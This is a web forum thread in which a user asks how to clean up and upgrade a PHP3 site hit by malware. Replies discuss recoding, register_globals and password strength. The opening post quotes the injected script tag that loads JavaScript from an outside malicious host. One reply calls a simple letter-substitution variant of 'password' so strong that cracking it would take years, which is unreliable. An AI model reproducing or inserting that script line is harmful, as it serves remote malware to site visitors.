Upgrade PHP3 website to PHP5

[ollielaroo]

Hi Guys,

 

My background consists of HTML, CSS, Dreamweaver, ASP and MS access and SQL.

Unfortunately I have no experience with PHP.

 

Recently my friend's website (which was built by someone else in the past, uses PHP3 and MySQL) has become a victim of a malware attack where the below line of code has been written to every .php3 page in the site:

<script src=http://www.movaddw.com/fgg.js></script>

There is an article about this here: http://infosec20.blogspot.com which I don't fully understand either. As a result my friend's adwords account with google has been suspended which is not good.

 

We got in touch with the support people who host the site, they advised us to

a) Remove the malicious line of code from each page and

b) Upgrade the site to php5

 

This is where I am now

a) I have removed the malicious line of code from all pages but

b) I have no idea what's involved in upgrading the site to PHP5!

 

I've opened the pages of the site in Dreamweaver and can see where 'php3' is mentioned in the code eg: include("settings.php3"); and the static links to the other pages like 'products.php3'.

After doing some googling on this I am beginning to think that a lot more advanced type of changes to the php3 code might be needed. This is where my confidence takes a dive.

 

I can see in the control panel where the site is hosted that the site is hosted on a server that uses PHP Version 4.4.7. There is also an option to request that the site be moved to a server that uses PHP Version 5.2.3

 

My question therefore is:

What exactly is involved and what do I need to when someone says "you need to update the code in all your .php3 pages to .php5"

 

 

I would be very grateful if any PHP gurus out there could offer assistance.

Thank you.

 

 

[wildteen88]

It is not as simple changing the file extensions form .php3 to .php5. The majority of the code will have to be redone, there is no other simple approach.

 

With out seeing the code I cannot give you specific instructions on what to do. If you're wanting to recode the site your self you're going to need to learn PHP, before doing anything make sure you have a good thorough understanding of the basics

[ollielaroo]

Thank you wildteen88, you have answered my question clearly.

 

Extracted some of the email from google adwords team:

> > If your site was compromised, it's important to not only remove the
> > malicious (and usually hidden) content from your pages, but to also
> > identify and fix the vulnerability. We suggest contacting your hosting
> > provider if you're unsure of how to proceed. StopBadware also has a
> > resource page for securing compromised sites at
> > http://www.stopbadware.org/home/security. Google uses its own criteria,
> > procedures, and tools to identify sites that host or distribute
> > malware. If you feel your site has been mistakenly identified, need
> > help understanding the issue and how to address it, or if you've made
> > changes to your site so that it no longer hosts or distributes
> > malicious software and you've secured your site so that it is no longer
> > vulnerable to the insertion of malware, please respond to this email to
> > let us know. We'd be happy to answer any questions you have and help
> > you resolve this serious issue.
> > Sincerely,
> >
> > The Google AdWords Team

 

I suppose if this happens again I'll just remove the malicious line of code from all infected pages. It looks like otherwise my friend should either go back to the person who built the site in the first place or have the site upgraded to PHP5 professionally.

 

Many thanks. 

[ollielaroo]

Oh, by the way anyone...

 

How the hell can these attacks manage to access the files on the server in order to insert the line of malicious code?? 

[wildteen88]

From an exploit in your PHP code. That is how sites get hacked. You should recode your site completely to prevent this.

 

One of the main reasons why sites get hacked is due to poor data validation, also as your site uses PHP3 then another cause is register_globals. As of PHP4 it has been disabled and is soon to be remove from PHP6. register_globals can cause security exploits within your code.

[ollielaroo]

....also as your site uses PHP3 then another cause is register_globals. As of PHP4 it has been disabled and is soon to be remove from PHP6. register_globals can cause security exploits within your code.

 

So when PHP6 is released does that mean whatever parts of the php3 website that requires these register_globals will not work/function correctly?

 

Is there any advantage in making the FTP password more secure?

Is there any advantage in making the password to the database more secure?

At the moment the FTP and database password is quite simple.

 

Thank you.

[Kairu]

There is always an advantage to having more secure passwords, but in this case the weak passwords most likely did not contribute to your site being compromised. It was probably because of vulnerabilities in the code itself. I wont go into detail as to WHAT they probably did, as I am not sure of this forums policies on discussing malicious code. But basically they found a vulnerability in the PHP itself that allowed your own pages to rewrite themselves with malicious code.

 

You will need to rewrite the code in order to plug these vulnerabilities, and will also most likely need to rewrite your code if you upgrade to PHP5, as the code itself changes between each version. Some functions are removed, others added and still others modified.

[flappy_warbucks]

 

So when PHP6 is released does that mean whatever parts of the php3 website that requires these register_globals will not work/function correctly?

 

 

Yes that is exactly what he is saying.

 

Is there any advantage in making the FTP password more secure?

 

Yes, it makes it harder for Brute force attacks to be successful.

 

Your Hosting provider should by default kick FTP users that fail to get the user name and password correct within predefined limit... Typically 10 tries, and then the IP address should be banned from accessing the server for about 2hrs.

 

Is there any advantage in making the password to the database more secure?

 

Yes, it makes it harder for Brute force attacks to be successful, altho if they get access to FTP then they have access to your database username and password.

 

At the moment the FTP and database password is quite simple.

 

Well complicate the password, instead of having "password" as your password have "p45s_w07d" which is a combination of letters and numbers and non-alphanumeric characters, it would take a brute force attack program potentially years to crack that.

 

Remember that a chain is only as strong as the weakest link, so even if you have the most secure site in the world, it would be pointless if your FTP Username name was admin and the password was pass

[kenrbnsn]

Your host is partly to blame on this one. PHP3 hasn't been supported for over 5+ years. They should have dropped support and then you would have had to upgrade to at least php4. If you want someone else to redo your code, post in the Freelancer area.

 

Ken

[ollielaroo]

Many thanks to all who contributed. You have been very helpful!

It looks like the site should definetly be recoded/revamped to PHP5, or even PHP6.

 

We will have to sit down and think this one through. Thanks again.